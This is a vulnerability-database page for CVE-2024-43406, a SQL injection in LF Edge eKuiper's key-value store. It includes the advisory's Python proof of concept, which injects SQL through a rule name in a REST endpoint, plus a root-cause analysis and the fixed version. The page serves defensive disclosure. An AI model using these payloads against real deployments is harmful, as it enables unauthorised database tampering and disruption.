8.8

CVSS Score

3.1

-

CVSS Score

Basic Information

CVE ID

CVE-2024-43406

GHSA ID

GHSA-r5ph-4jxm-6j9p

EPSS Score

0.68839%

CWE

CWE-89

Published

8/20/2024

Updated

8/27/2024

KEV Status

Technology

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2024-43406

CVE-2024-43406: LF Edge eKuiper has a SQL Injection in sqlKvStore

Summary

A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore.

Details

I will use explainRuleHandler ("/rules/{name}/explain") as an example to illustrate. However, this vulnerability also exists in other methods such as sourceManageHandler, asyncTaskCancelHandler, pluginHandler, etc.

The SQL injection can happen in the code: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L89-L93 The code to accept user input is: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/server/rest.go#L274-L277

The rule id in the above code can be used to exploit SQL query.

Note that the delete function is also vulnerable: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L138-L141

PoC

import requests
from urllib.parse import quote

# SELECT val FROM 'xxx' WHERE key='%s';
payload = f"""'; ATTACH DATABASE 'test93' AS test93;
CREATE TABLE test93.pwn (dataz text);
INSERT INTO test93.pwn (dataz) VALUES ("sql injection");--"""

#payload = "deadbeef'; SELECT 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(100000000))));--"

url = f"http://127.0.0.1:9081/rules/{quote(payload,safe='')}/explain"   # explainRuleHandler

res = requests.get(url)
print(res.content)

The screenshot shows the malicious SQL query to insert a value:

The screenshot shows the breakpoint of executing the query:

Impact

SQL Injection vulnerability

The reporters are Yuan Luo, Shuai Xiong, Haoyu Wang from Tencent YunDing Security Lab.

(GitHub Advisory)

Miggo Vulnerability Database

→

CVE-2024-43406

CVE-2024-43406:

8.8

CVSS Score

3.1

-

CVSS Score

Basic Information

CVE ID

CVE-2024-43406

GHSA ID

GHSA-r5ph-4jxm-6j9p

EPSS Score

0.68839%

CWE

CWE-89

Published

8/20/2024

Updated

8/27/2024

KEV Status

Technology

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
github.com/lf-edge/ekuiper	go	< 1.14.2	1.14.2
ekuiper	pip	>= 0, < 1.14.2	1.14.2

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from string concatenation of user-controlled input (key parameter) into SQL queries across multiple functions in sqlKv.go. The original code used fmt.Sprintf to directly embed user input into query strings (e.g., "WHERE key='%s'"), rather than using parameterized queries. This pattern is visible in:

Get() lines 89-93 (pre-patch)
GetKeyedState() lines 110-115
Delete() lines 138-141

The commit diff shows these were fixed by switching to prepared statements with '?' placeholders. The PoC demonstrates exploitation through the explainRuleHandler which passes user input to these vulnerable functions. High confidence comes from direct code evidence, CWE-89 classification, and the explicit patch strategy.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

8.8

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2024-43406: LF Edge eKuiper has a SQL Injection in sqlKvStore

Summary

Details

PoC

Impact

CVE-2024-43406:

8.8

-

Basic Information

Basic Information

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability IntelligenceMiggo AI

Technical Details

Basic Information

Basic Information

8.8

8.8

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

CVE-2024-43406: LF Edge eKuiper has a SQL Injection in sqlKvStore

Summary

Details

PoC

Impact

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI